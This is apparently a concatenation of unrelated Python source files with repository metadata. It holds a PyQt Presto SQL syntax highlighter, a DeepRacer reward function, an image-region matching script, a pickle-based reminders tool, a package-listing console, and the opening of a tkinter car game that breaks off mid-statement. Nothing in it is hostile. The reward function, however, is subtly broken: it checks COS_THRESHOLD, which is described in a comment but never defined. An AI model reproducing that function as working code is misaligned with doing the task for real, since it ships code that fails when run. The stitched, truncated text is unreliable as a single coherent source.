|
syntax.py
|
piekill/pypresto
| 4
|
12777976
|
<filename>syntax.py
# syntax.py
from PyQt5.QtCore import QRegExp, Qt
from PyQt5.QtGui import QColor, QTextCharFormat, QFont, QSyntaxHighlighter
def format(color, style=''):
"""Return a QTextCharFormat with the given attributes.
"""
_color = QColor()
_color.setNamedColor(color)
_format = QTextCharFormat()
_format.setForeground(_color)
if 'bold' in style:
_format.setFontWeight(QFont.Bold)
if 'italic' in style:
_format.setFontItalic(True)
return _format
# Syntax styles that can be shared by all languages
STYLES = {
'keyword': format('blue'),
'operator': format('red'),
'brace': format('darkGray'),
'constant': format('black', 'bold'),
'string': format('magenta'),
'string2': format('darkMagenta'),
'comment': format('darkGreen', 'italic'),
'function': format('darkCyan', 'italic'),
'numbers': format('brown'),
}
class PrestoHighlighter (QSyntaxHighlighter):
"""Syntax highlighter for Presto SQL.
"""
# keywords
keywords = [
'alter', 'as', 'by', 'case', 'constraint', 'create', 'cross', 'cube',
'deallocate', 'delete', 'describe', 'distinct', 'drop', 'else', 'end',
'escape', 'except', 'execute', 'exists', 'extract', 'for', 'from',
'full', 'group', 'grouping', 'having', 'inner', 'insert', 'intersect',
'into', 'join', 'left', 'natural', 'normalize', 'on', 'order', 'outer',
'prepare', 'recursive', 'right', 'rollup', 'select', 'show', 'table',
'then', 'uescape', 'union', 'using', 'values', 'when', 'where', 'with']
# functions
functions = [
'abs', 'acos', 'approx_distinct', 'approx_percentile', 'approx_set',
'arbitrary', 'array_agg', 'array_distinct', 'array_except',
'array_intersect', 'array_join', 'array_max', 'array_min',
'array_position', 'array_remove', 'array_sort', 'array_union',
'arrays_overlap', 'asin', 'atan', 'atan2', 'avg', 'bar', 'beta_cdf',
'cardinality', 'cast', 'cbrt', 'ceil', 'ceiling', 'char2hexint',
'checksum', 'chr', 'classify', 'coalesce', 'codepoint', 'color',
'concat', 'contains', 'convex_hull_agg', 'corr', 'cos', 'cosh',
'cosine_similarity', 'count', 'count_if', 'covar_pop', 'covar_samp',
'crc32', 'cume_dist', 'current_date', 'current_path', 'current_time',
'current_timestamp', 'current_timezone', 'current_user', 'date',
'date_add', 'date_diff', 'date_format', 'date_parse', 'date_trunc',
'day', 'day_of_month', 'day_of_week', 'day_of_year', 'degrees',
'dense_rank', 'dow', 'doy', 'e', 'element_at', 'empty_approx_set',
'evaluate_classifier_predictions', 'every', 'exp', 'features',
'filter', 'first_value', 'flatten', 'floor', 'great_circle_distance',
'greatest', 'hamming_distance', 'hash_counts', 'histogram', 'hmac_md5',
'hmac_sha1', 'hmac_sha256', 'hmac_sha512', 'hour', 'index', 'infinity',
'intersection_cardinality', 'inverse_beta_cdf', 'inverse_normal_cdf',
'is_finite', 'is_infinite', 'is_json_scalar', 'is_nan',
'jaccard_index', 'json_array_contains', 'json_array_get',
'json_array_length', 'json_extract', 'json_extract_scalar',
'json_format', 'json_parse', 'json_size', 'kurtosis', 'lag',
'last_value', 'lead', 'learn_classifier', 'learn_libsvm_classifier',
'learn_libsvm_regressor', 'learn_regressor', 'least', 'length',
'levenshtein_distance', 'like_pattern', 'line_locate_point', 'ln',
'localtime', 'localtimestamp', 'log10', 'log2', 'lower', 'lpad',
'ltrim', 'make_set_digest', 'map', 'map_agg', 'map_concat',
'map_entries', 'map_filter', 'map_from_entries', 'map_keys',
'map_union', 'map_values', 'map_zip_with', 'max', 'max_by', 'md5',
'merge', 'merge_set_digest', 'millisecond', 'min', 'min_by', 'minute',
'mod', 'nullif', 'parse_presto_data_size', 'qdigest_agg', 'quarter',
'radians', 'rand', 'random', 'rank', 'reduce', 'reduce_agg',
'regexp_extract', 'regexp_extract_all', 'regexp_like',
'regexp_replace', 'regexp_split', 'regr_intercept', 'regr_slope',
'regress', 'render', 'repeat', 'replace', 'reverse', 'rgb', 'round',
'row_number', 'rpad', 'rtrim', 'second', 'sequence', 'sha1', 'sha256',
'sha512', 'shuffle', 'sign', 'simplify_geometry', 'sin', 'skewness',
'slice', 'spatial_partitioning', 'spatial_partitions', 'split',
'split_part', 'split_to_map', 'split_to_multimap', 'spooky_hash_v2_32',
'spooky_hash_v2_64', 'sqrt', 'ST_Area', 'ST_AsBinary', 'ST_AsText',
'ST_Boundary', 'ST_Buffer', 'ST_Centroid', 'ST_Contains',
'ST_ConvexHull', 'ST_CoordDim', 'ST_Crosses', 'ST_Difference',
'ST_Dimension', 'ST_Disjoint', 'ST_Distance', 'ST_EndPoint',
'ST_Envelope', 'ST_EnvelopeAsPts', 'ST_Equals', 'ST_SymDifference',
'ST_Touches', 'ST_Union', 'ST_Within', 'ST_X', 'ST_XMax', 'ST_XMin',
'ST_Y', 'ST_YMax', 'ST_YMin', 'stddev', 'stddev_pop', 'stddev_samp',
'strpos', 'substr', 'substring', 'sum', 'tan', 'tanh', 'timezone_hour',
'timezone_minute', 'to_base', 'to_base64', 'to_base64url',
'to_big_endian_32', 'to_big_endian_64', 'to_char', 'to_date',
'to_geometry', 'to_hex', 'to_ieee754_32', 'to_ieee754_64',
'to_iso8601', 'to_milliseconds', 'to_spherical_geography',
'to_timestamp', 'to_unixtime', 'to_utf8', 'transform',
'transform_keys', 'transform_values', 'trim', 'truncate', 'try',
'try_cast', 'typeof', 'unnest', 'upper', 'url_decode', 'url_encode',
'url_extract_fragment', 'url_extract_host', 'url_extract_parameter',
'url_extract_path', 'url_extract_port', 'url_extract_protocol',
'url_extract_query', 'uuid', 'value_at_quantile',
'values_at_quantiles', 'var_pop', 'var_samp', 'variance', 'week',
'week_of_year', 'width_bucket', 'wilson_interval_lower',
'wilson_interval_upper', 'word_stem', 'xxhash64', 'year_of_week',
'yearcast', 'yow', 'zip', 'zip_with']
# constants
constants = [
'false', 'null', 'true'
]
# operators
operators = [
        '=', '->',
# Comparison
'==', '!=', '<', '<=', '>', '>=',
# Arithmetic
r'\+', '-', r'\*', '/', '//', r'\%', r'\*\*',
# In-place
r'\+=', '-=', r'\*=', '/=', r'\%=',
# Bitwise
r'\^', r'\|', r'\&', r'\~', '>>', '<<',
' and ', ' between ', ' in ', ' is ', ' like ', ' not ', ' or '
]
# braces
braces = [
r'\{', r'\}', r'\(', r'\)', r'\[', r'\]',
]
def __init__(self, document):
QSyntaxHighlighter.__init__(self, document)
# Multi-line strings (expression, flag, style)
# FIXME: The triple-quotes in these two lines will mess up the
# syntax highlighting from this point onward
self.tri_single = (QRegExp("'''"), 1, STYLES['string2'])
self.tri_double = (QRegExp('"""'), 2, STYLES['string2'])
rules = []
# Keyword, function, constant, operator, and brace rules
rules += [(r'\b%s\b' % w, 0, STYLES['keyword'])
for w in PrestoHighlighter.keywords]
rules += [(r'\b%s\b' % f, 0, STYLES['function'])
for f in PrestoHighlighter.functions]
rules += [(r'\b%s\b' % c, 0, STYLES['constant'])
for c in PrestoHighlighter.constants]
rules += [(r'%s' % o, 0, STYLES['operator'])
for o in PrestoHighlighter.operators]
rules += [(r'%s' % b, 0, STYLES['brace'])
for b in PrestoHighlighter.braces]
# All other rules
rules += [
# Double-quoted string, possibly containing escape sequences
(r'"[^"\\]*(\\.[^"\\]*)*"', 0, STYLES['string']),
# Single-quoted string, possibly containing escape sequences
(r"'[^'\\]*(\\.[^'\\]*)*'", 0, STYLES['string']),
# From '--' until a newline
(r'--[^\n]*', 0, STYLES['comment']),
# Numeric literals
(r'\b[+-]?[0-9]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?0[xX][0-9A-Fa-f]+[lL]?\b', 0, STYLES['numbers']),
(r'\b[+-]?[0-9]+(?:\.[0-9]+)?(?:[eE][+-]?[0-9]+)?\b',
0, STYLES['numbers']),
]
# Build a QRegExp for each pattern
self.rules = [(QRegExp(pat, Qt.CaseInsensitive), index, fmt)
for (pat, index, fmt) in rules]
def highlightBlock(self, text):
"""Apply syntax highlighting to the given block of text.
"""
# Do other syntax formatting
for expression, nth, format in self.rules:
index = expression.indexIn(text, 0)
while index >= 0:
# We actually want the index of the nth match
index = expression.pos(nth)
length = len(expression.cap(nth))
self.setFormat(index, length, format)
index = expression.indexIn(text, index + length)
self.setCurrentBlockState(0)
# Do multi-line strings
in_multiline = self.match_multiline(text, *self.tri_single)
if not in_multiline:
in_multiline = self.match_multiline(text, *self.tri_double)
def match_multiline(self, text, delimiter, in_state, style):
"""Do highlighting of multi-line strings. ``delimiter`` should be a
``QRegExp`` for triple-single-quotes or triple-double-quotes, and
``in_state`` should be a unique integer to represent the corresponding
state changes when inside those strings. Returns True if we're still
inside a multi-line string when this function is finished.
"""
# If inside triple-single quotes, start at 0
if self.previousBlockState() == in_state:
start = 0
add = 0
# Otherwise, look for the delimiter on this line
else:
start = delimiter.indexIn(text)
# Move past this match
add = delimiter.matchedLength()
# As long as there's a delimiter match on this line...
while start >= 0:
# Look for the ending delimiter
end = delimiter.indexIn(text, start + add)
# Ending delimiter on this line?
if end >= add:
length = end - start + add + delimiter.matchedLength()
self.setCurrentBlockState(0)
# No; multi-line string
else:
self.setCurrentBlockState(in_state)
                length = len(text) - start + add
# Apply formatting
self.setFormat(start, length, style)
# Look for the next match
start = delimiter.indexIn(text, start + length)
# Return True if still inside a multi-line string, False otherwise
if self.currentBlockState() == in_state:
return True
else:
return False
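# Usage sketch (illustrative, not part of the original module): attach the highlighter
# to the QTextDocument backing an editor widget.
#
#   from PyQt5.QtWidgets import QApplication, QPlainTextEdit
#   app = QApplication([])
#   editor = QPlainTextEdit()
#   highlighter = PrestoHighlighter(editor.document())
#   editor.setPlainText("SELECT count(*) FROM nation -- sample query")
#   editor.show()
#   app.exec_()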
| 2.640625
| 3
|
function/AWS-DR-Cherry-E.py
|
Iviglious/deep-race-cherry
| 0
|
12777977
|
def reward_function(params):
'''
Cosine reward function for heading angle
'''
# Import libraries
import math
# PARAMETERS (CONSTANTS)
# Total num of steps we want the car to finish the lap, it will vary depends on the track length
TOTAL_NUM_STEPS = 300
    # Threshold on the scaled cosine reward (cos(angle) * 3 - 2); 0.1213 corresponds to
    # roughly 45 degrees between the car's heading and the track direction (closest waypoints).
# Max speed
MAX_SPEED = 12.1
# Max steering angle (degree)
MAX_STEERING = 30.1
# Read input parameters
distance_from_center = params['distance_from_center']
track_width = params['track_width']
steering_abs = abs(params['steering_angle']) # Only need the absolute steering angle (max: 30, min -30)
speed = params['speed']
steps = params['steps']
progress = params['progress']
all_wheels_on_track = params['all_wheels_on_track']
waypoints = params['waypoints']
closest_waypoints = params['closest_waypoints']
heading = params['heading']
# Calculate 3 markers that are at varying distances away from the center line
marker_1 = 0.1 * track_width
marker_2 = 0.25 * track_width
marker_3 = 0.5 * track_width
# Give higher reward if the agent is closer to center line and vice versa
if distance_from_center <= marker_1:
reward = 1
elif distance_from_center <= marker_2:
reward = 0.5
elif distance_from_center <= marker_3:
reward = 0.1
else:
reward = 1e-3 # likely crashed/ close to off track
# Calculate the direction of the center line based on the closest waypoints
next_point = waypoints[closest_waypoints[1]]
prev_point = waypoints[closest_waypoints[0]]
    # Calculate the direction with arctan2(dy, dx); the result is in (-pi, pi) radians
track_angle = math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
# Convert to degree
track_angle = math.degrees(track_angle)
    # Scaled cosine of the angle between the heading and the track direction
    cos_value = math.cos(math.radians(track_angle - heading)) * 3.0 - 2.0 # cos * 3 - 2 (0 deg -> 1, ~45 deg -> 0.1213)
#print('Track angle: {0}, Heading angle: {1}, Cos: {2}'.format(track_angle, heading, cos_value))
# Penalize the reward if the heading angle is too large
if cos_value < COS_THRESHOLD:
reward *= 0.01
else:
reward *= cos_value
# Give additional reward if the car pass every 100 steps faster than expected
if (steps % 100) == 0 and progress > (steps / TOTAL_NUM_STEPS) * 100 :
reward += progress/100.0
# Penalize if the car goes off track
if not all_wheels_on_track:
reward = 1e-3
return float(reward)
# Test function
print(reward_function({
'distance_from_center': 0
,'track_width': 10
,'steering_angle': 0
,'speed': 1
,'steps': 0
,'progress': 0
,'all_wheels_on_track': True
,'waypoints':[(100,100),(150,100)]
,'closest_waypoints':[0,1]
,'heading': 0
}))
| 3.453125
| 3
|
matching_area/matching_area.py
|
neuroinformatics/bah2015_registration
| 0
|
12777978
|
# -*- coding: utf-8 -*-
import sys
from PIL import Image
from PIL import ImageStat
def matching_ish(labeled_filename, ish_filename, output_filename, slice):
N_AREA = 40
threshold = 10
volume_threshold = 10
volume_bias = 40
labeled_count = {}
labeled_volume = {}
result_value = {}
result_value_max = {}
result_value_per_vol = {}
labeled = Image.open(labeled_filename)
labeled.seek(slice)
labeled_data = labeled.getdata()
ish = Image.open(ish_filename)
ish_data = ish.getdata()
for value in range(N_AREA):
labeled_volume[value] = 0
result_value[value] = 0
result_value_max[value] = 0
result_value_per_vol[value] = 0
# calculate volume of each area
for value in labeled_data:
value = int(value)
labeled_volume[value] += 1
# summation value of each area
for (ish_val, labeled_val) in zip(ish_data, labeled_data):
if(int(labeled_val)!=0 and ish_val):
#value = 256 - (ish_val[0] + ish_val[1] + ish_val[2]) / 3
#value = ish_val[2]*2 - ish_val[0] - ish_val[1];
            value = ish_val[2]*2 - (ish_val[0] + ish_val[1]) * 0.9
if value > threshold:
result_value[int(labeled_val)] += value
if value > result_value_max[int(labeled_val)]:
result_value_max[int(labeled_val)] = value
# normalize value by volume
for i in range(N_AREA):
if labeled_volume[i] > volume_threshold:
result_value_per_vol[i] = float(result_value[i]) / float(labeled_volume[i] + volume_bias)
else:
result_value_per_vol[i] = 0
# write to file
fp = open(output_filename, 'w')
lines = []
#for (k, v) in result_value.items():
for (k, v) in result_value_per_vol.items():
lines.append('%d, %6.1f\n' % (k, v))
fp.writelines(lines)
fp.close()
# show result
i = 1
for k, v in sorted(result_value_per_vol.items(), key=lambda x:x[1], reverse=True):
        print('Rank %3d : Area %3d (normal value = %6.1f, value = %6d, volume = %6d)' % (i, k, v, result_value[k], labeled_volume[k]))
i += 1
return result_value
if __name__ == '__main__':
argvs = sys.argv
argc = len(argvs)
labeled_filename = '/mnt/data1/bah2015/reslice_labeled.tif'
if argc >= 2:
ish_filename = argvs[1]
else:
#ish_filename = '/media/nebula/data/bah/CD00050.1-VimRegistered.tif'
ish_filename = '/mnt/data1/bah2015/registration_Affine/CD02689.1-Dtl.tif'
if argc >= 3:
out_filename = argvs[2]
else:
out_filename = './result/CD02689.1-Dtl.txt'
if argc >= 4:
slice = int(argvs[3])
else:
slice = 112
#analysis_tif(labeled_filename, ish_filename, out_filename, slice)
#regen_segfile(labeled_filename)
    print(ish_filename)
matching_ish(labeled_filename, ish_filename, out_filename, slice)
| 2.765625
| 3
|
cilantropy/console.py
|
foozzi/cilantro
| 49
|
12777979
|
"""
.. module:: console
:platform: Unix, Windows
:synopsis: Cilantropy entry-point for console commands
:mod:`console` -- Cilantropy entry-point for console commands
==================================================================
"""
from .helpers import get_shared_data
from .helpers import get_pkg_res
from .helpers import get_pypi_search
from .helpers import get_pypi_releases
from .helpers import parse_dict
from .helpers import get_kv_colored
from .helpers import get_field_formatted
from .helpers import create_paste_template
from . import metadata
from .settings import __version__
from .settings import __author__
from .settings import __author_url__
from .settings import TEKNIK_PASTE_API
from flask import json
from docopt import docopt
import urllib
import urllib.request
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
import pkg_resources
def cmd_show(args, short=False):
"""This function implements the package show command.
:param args: the docopt parsed arguments
"""
proj_name = args["<project_name>"]
try:
pkg_dist = get_pkg_res().get_distribution(proj_name)
    except:
        print(
            Fore.RED
            + Style.BRIGHT
            + "Error: unable to locate the project '%s' !" % proj_name
        )
        raise RuntimeError("Project not found !")
    try:
        pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
    except FileNotFoundError:
        pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
proj_head = Fore.GREEN + Style.BRIGHT + pkg_dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + pkg_dist.version
    print(proj_head)
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
# Remove long fields and used fields
if "description" in distinfo:
del distinfo["description"]
if "summary" in distinfo:
del distinfo["summary"]
if "name" in distinfo:
del distinfo["name"]
if "version" in distinfo:
del distinfo["version"]
classifier = None
if "classifier" in distinfo:
classifier = distinfo["classifier"]
del distinfo["classifier"]
for key in distinfo:
print(get_field_formatted(distinfo, key))
if short:
return
print()
print(get_kv_colored("location", pkg_dist.location))
requires = pkg_dist.requires()
if len(requires) == 0:
print(get_kv_colored("requires", "none"))
else:
req_text = "\n"
for req in requires:
req_text += " " * 4 + str(req) + "\n"
print(get_kv_colored("requires", req_text))
entry_points = pkg_dist.get_entry_map()
console_scripts = entry_points.get("console_scripts")
if console_scripts:
console_scr_text = Fore.WHITE + Style.BRIGHT + " Console Scripts:" + "\n"
for name, entry in console_scripts.items():
console_scr_text += (
Fore.YELLOW + Style.BRIGHT + " " * 4 + name + Fore.WHITE + Style.BRIGHT
)
console_scr_text += (
" -> "
+ Fore.GREEN
+ Style.BRIGHT
+ entry.module_name
+ ":"
+ ",".join(entry.attrs)
+ "\n"
)
print(console_scr_text)
if classifier:
distinfo["classifier"] = classifier
print(get_field_formatted(distinfo, "classifier"))
def cmd_list_detail(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name
proj_head += Fore.YELLOW + Style.BRIGHT + " " + dist.version
print(proj_head)
proj_sum = Fore.WHITE + Style.DIM
proj_sum += "- " + parse_dict(distinfo, "summary", True)
print(proj_sum)
print(get_field_formatted(distinfo, "Author"))
author_email = distinfo.get("author-email")
if author_email:
print("<%s>" % author_email)
else:
print()
print(get_field_formatted(distinfo, "Home-page"))
print(get_field_formatted(distinfo, "License"))
print(get_field_formatted(distinfo, "Platform"))
def cmd_list_compact(dist, distinfo):
proj_head = Fore.GREEN + Style.BRIGHT + dist.project_name.ljust(25)
proj_head += Fore.WHITE + Style.BRIGHT + " " + dist.version.ljust(12)
print(proj_head, end="")
proj_sum = Fore.WHITE + Style.DIM
proj_sum += " " + parse_dict(distinfo, "summary", True)
print(proj_sum.ljust(100))
def cmd_list(args):
"""This function implements the package list command.
:param args: the docopt parsed arguments
"""
compact = args["--compact"]
filt = args["<filter>"]
distributions = get_shared_data()["distributions"]
if compact:
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Project Name".ljust(26)
+ "Version".ljust(14)
+ "Summary"
)
print("-" * 80)
for dist in distributions:
if filt:
if filt.lower() not in dist.project_name.lower():
continue
pkg_dist = get_pkg_res().get_distribution(dist.key)
            try:
                pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
            except FileNotFoundError:
                pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
parsed, key_known = metadata.parse_metadata(pkg_metadata)
distinfo = metadata.metadata_to_dict(parsed, key_known)
if compact:
cmd_list_compact(dist, distinfo)
else:
cmd_list_detail(dist, distinfo)
def cmd_check(args):
proj_name = args["<project_name>"]
cmd_show(args, short=True)
print()
print(Fore.GREEN + Style.BRIGHT + "Searching for updates on PyPI...")
print()
pkg_dist_version = get_pkg_res().get_distribution(proj_name).version
pypi_rel = get_pypi_releases(proj_name)
if pypi_rel:
pypi_last_version = get_pkg_res().parse_version(pypi_rel[0])
current_version = get_pkg_res().parse_version(pkg_dist_version)
try:
version_index = pypi_rel.index(pkg_dist_version)
except:
version_index = len(pypi_rel)
for version in pypi_rel[0 : version_index + 3]:
print(Fore.WHITE + Style.BRIGHT + " Version %s" % version, end=" ")
if version == pypi_rel[0]:
print(Fore.BLUE + Style.BRIGHT + "[last version]", end=" ")
if version == pkg_dist_version:
print(Fore.GREEN + Style.BRIGHT + "[your version]", end="")
print()
print()
if pypi_last_version > current_version:
print(
Fore.RED
+ Style.BRIGHT
+ " Your version is outdated, you're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.RED
+ Style.BRIGHT
+ " but the last version is "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
if pypi_last_version == current_version:
print(Fore.GREEN + Style.BRIGHT + " Your version is updated !")
if pypi_last_version < current_version:
print(
Fore.YELLOW
+ Style.BRIGHT
+ " Your version newer than the version available at PyPI !"
)
print(
Fore.YELLOW
+ Style.BRIGHT
+ " You're using "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s," % pkg_dist_version
+ Fore.YELLOW
+ Style.BRIGHT
+ " but the last version in PyPI "
+ Fore.WHITE
+ Style.BRIGHT
+ "v.%s !" % pypi_rel[0]
)
else:
print("No versions found on PyPI !")
def cmd_scripts(args):
filt = args["<filter>"]
print(
Fore.YELLOW
+ Style.BRIGHT
+ "Script Name".ljust(23)
+ "Project Name".ljust(21)
+ "Module Name"
)
print("-" * 80)
for entry in pkg_resources.iter_entry_points("console_scripts"):
if filt:
if filt.lower() not in entry.name.lower():
continue
print(Fore.GREEN + Style.BRIGHT + entry.name.ljust(22), end="")
print(Fore.WHITE + Style.NORMAL + str(entry.dist).ljust(20), end="")
print(Fore.BLUE + Style.BRIGHT + entry.module_name, end="")
print(Fore.BLUE + Style.NORMAL + "(" + entry.attrs[0] + ")", end="\n")
def cmd_paste(args):
template_data = create_paste_template()
data = urllib.parse.urlencode({"code": template_data})
res = urllib.request.urlopen(TEKNIK_PASTE_API, bytes(data, encoding="utf-8"))
result = json.loads(res.read().decode("utf-8"))
if "result" in result:
print(
Fore.GREEN + Style.BRIGHT + "Paste url: {}".format(result["result"]["url"])
)
else:
print(Fore.RED + Style.BRIGHT + "ERROR PASTE!")
def run_main():
"""Cilantropy - Python List Packages (PLP)
Usage:
plp list [--compact] [<filter>]
plp show <project_name>
plp check <project_name>
plp scripts [<filter>]
plp paste [list your packages to pastebin service]
plp (-h | --help)
plp --version
Options:
--compact Compact list format
-h --help Show this screen.
--version Show version.
"""
init(autoreset=True)
arguments = docopt(
run_main.__doc__,
version="Cilantropy v.%s - Python List Packages (PLP)" % __version__,
)
if arguments["list"]:
cmd_list(arguments)
if arguments["show"]:
cmd_show(arguments)
if arguments["check"]:
cmd_check(arguments)
if arguments["scripts"]:
cmd_scripts(arguments)
if arguments["paste"]:
cmd_paste(arguments)
if __name__ == "__main__":
run_main()
| 2.21875
| 2
|
todo.py
|
puntogris/recordatorios
| 0
|
12777980
|
# Reminders program
import pickle
import os
# Create an empty list in a file called 'outfile' with pickle if one does not exist yet;
# otherwise open the previously created file
if os.path.isfile('./outfile') == False:
recordatorios = []
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
else:
    with open('outfile', 'rb') as fp:
recordatorios = pickle.load(fp)
# Menu options
print('Opciones:')
print('\
1 - Ver recordatorios\n\
2 - Agregar items\n\
3 - Quitar items\n\
4 - Salir\
')
# Display the list vertically and number its items
def mostrar_items(lista):
print("Recordatorios:")
for lugar,line in enumerate(lista):
print(" ",lugar + 1,'-' , line)
# Main function handling each command
def main():
ordenes = int(input('Que queres hacer?... '))
if ordenes == 1:
if recordatorios == []:
print("No tenes recordatorios.")
main()
else:
mostrar_items(recordatorios)
main()
elif ordenes == 2:
agregar_recordar = input('Ingresa de lo que queres que te recuerde... ')
recordatorios.append(agregar_recordar.capitalize())
mostrar_items(recordatorios)
main()
elif ordenes == 3:
mostrar_items(recordatorios)
item = int(input('Ingresa el numero de item a eliminar: '))
del recordatorios[item - 1]
mostrar_items(recordatorios)
main()
elif ordenes == 4:
with open('outfile', 'wb') as fp:
pickle.dump(recordatorios, fp)
quit('Adios!')
else:
print('Error, intenta de nuevo.')
main()
main()
| 3.75
| 4
|
car.py
|
git4robot/CarGame
| 0
|
12777981
|
from tkinter import *
from tkinter import messagebox, colorchooser
from logging import basicConfig, warning, info, error, DEBUG
from os import getcwd, path, mkdir
from time import strftime, time, localtime
from json import dump, load
from re import findall, search
from hmac import new, compare_digest
from hashlib import sha224, sha512
from secrets import choice
from string import ascii_letters
from requests import get
from smtplib import SMTP, SMTPRecipientsRefused
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
class Vigenere:
def __init__(self):
self.letter_list = 'A B C D E F G H I J K L M N O P Q R S T U V W X Y Z'.split(' ')
self.number_list = list(range(26))
def encipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.encipher_text_list1 = [x for x in list(msg)]
self.encipher_text_list2 = [x for x in list(self.secret_key)]
self.encipher_text_list = []
for x in range(len(msg)):
self.encipher_text_list += [[self.encipher_text_list1[x], self.encipher_text_list2[x]]]
self.output_list = []
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.encipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.encipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_msg]:] + list(self.letter_list[0:self.number_list[self.num_msg]])
self.output_list += self.new_letter_list[self.num_key]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
def decipher(self, msg, secret_key):
self.pattern_list = findall(r'[\s]|[0123456789]|[~`!@#\$%\^&\*()_\+\-={}|\[\]\\:";\'\<\>\?,./", ]', msg)
msg = msg.upper()
for x in self.pattern_list:
msg = msg.replace(x, '')
self.secret_key = secret_key.upper()
while True:
if len(self.secret_key) < len(msg):
self.secret_key *= 2
else:
self.secret_key = self.secret_key[:len(msg)].upper()
break
self.decipher_text_list1 = [x for x in list(msg)]
self.decipher_text_list2 = [x for x in list(self.secret_key)]
self.decipher_text_list = []
for x in range(len(msg)):
self.decipher_text_list += [[self.decipher_text_list1[x], self.decipher_text_list2[x]]]
self.output_list = []
self.msg_list = list(msg)
for x in range(len(msg)):
self.num_msg = self.number_list[self.letter_list.index(self.decipher_text_list[x][0])]
self.num_key = self.number_list[self.letter_list.index(self.decipher_text_list[x][1])]
self.new_letter_list = self.letter_list[self.number_list[self.num_key]:] + list(self.letter_list[0:self.number_list[self.num_key]])
self.output_list += self.letter_list[self.new_letter_list.index(self.msg_list[x])]
self.output = ''
for x in self.output_list:
self.output += x
return self.output
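# Editor's note: an illustrative round trip through the Vigenere class above;
# it is not called anywhere and the message/key are arbitrary examples.
# encipher() strips spaces, digits and punctuation, so the deciphered text
# comes back without the original spacing.
def _vigenere_example():
    cipher = Vigenere()
    token = cipher.encipher('ATTACK AT DAWN', 'LEMON')   # 'LXFOPVEFRNHR'
    plain = cipher.decipher(token, 'LEMON')              # 'ATTACKATDAWN'
    return token, plain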
class GUI():
def __init__(self):
CreateLogFile()
try:
self.newcolor = Config('color.json').loadfile()
except FileNotFoundError:
self.newcolor = None
Config('color.json').createfile(self.newcolor)
self.root = Tk()
self.root.title('Car Game')
self.root.resizable(0, 0)
try:
open('.\\.image\\car.ico')
self.root.iconbitmap('.\\.image\\car.ico')
except FileNotFoundError:
CreateFolder('.image')
with open('.\\.image\\car.ico', 'wb') as code:
code.write(get('https://www.easyicon.net/download/ico/1284184/128/').content)
self.rstr = StringVar()
self.rint = IntVar()
self.screenwidth = self.root.winfo_screenwidth()
self.screenheight = self.root.winfo_screenheight()
alignstr = f'750x600+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.root.geometry(alignstr)
self.lable = Label(self.root, height = 600, width = 750, bd = 0, \
bg = self.newcolor, highlightthickness = 0)
self.lable.pack()
        self.check_account = Label(self.root, height = 200, width = 200, bd = 0, \
                                   bg = self.newcolor, highlightthickness = 0, text = 'l')
        self.check_account.pack(anchor = 'nw')
self.menu = Menu(self.root, bd = 0, tearoff = False)
self.file = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'File', menu = self.file)
self.file.add_command(label = 'Edit Color', command = self.color)
self.file.add_separator()
self.file.add_command(label = 'Exit', command = self.rquit)
self.rmenu = Menu(self.root, tearoff = False)
self.rmenu.add_command(label = 'Exit', command = self.rquit)
self.lable.bind('<Button-3>', self.popup)
self.createcar = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Cars', menu = self.createcar)
self.createcar.add_command(label = 'Create New Car', \
command = self.create_car_gui)
self.account = Menu(self.menu, tearoff = False)
self.menu.add_cascade(label = 'Account Manage', menu = self.account)
self.account.add_command(label = 'Login', command = self.login)
self.account.add_command(label = 'Register', command = self.register)
self.root.config(menu = self.menu)
self.root.mainloop()
def register(self):
self.registertop = Toplevel(bg = self.newcolor)
self.registertop.title('Register')
self.registertop.resizable(0, 0)
alignstr = f'250x200+{(self.screenwidth - 750) // 2}+{(self.screenheight - 600) // 2 - 50}'
self.registertop.geometry(alignstr)
self.registertop.iconbitmap('.\\.image\\car.ico')
label1 = Label(self.registertop, text = 'User Name', \
bg = self.newcolor).place(relx = .025, rely = .03)
self.username = Entry(self.registertop, bg = self.newcolor)
self.username.place(relx = .45, rely = .04)
label2 = Label(self.registertop, text = 'Email', \
bg = self.newcolor).place(relx = .025, rely = .14)
self.emailname = Entry(self.registertop, bg = self.newcolor)
self.emailname.place(relx = .45, rely = .15)
label3 = Label(self.registertop, text = 'Password', \
bg = self.newcolor).place(relx = .025, rely = .25)
self.password = Entry(self.registertop, bg = self.newcolor, show = '*')
self.password.place(relx = .45, rely = .26)
label4 = Label(self.registertop, text = 'Confirm Password', \
bg = self.newcolor).place(relx = .025, rely = .36)
self.conpassword = Entry(self.registertop, bg = self.newcolor, show = '*')
self.conpassword.place(relx = .45, rely = .37)
button = Button(self.registertop, text = 'Create Account', \
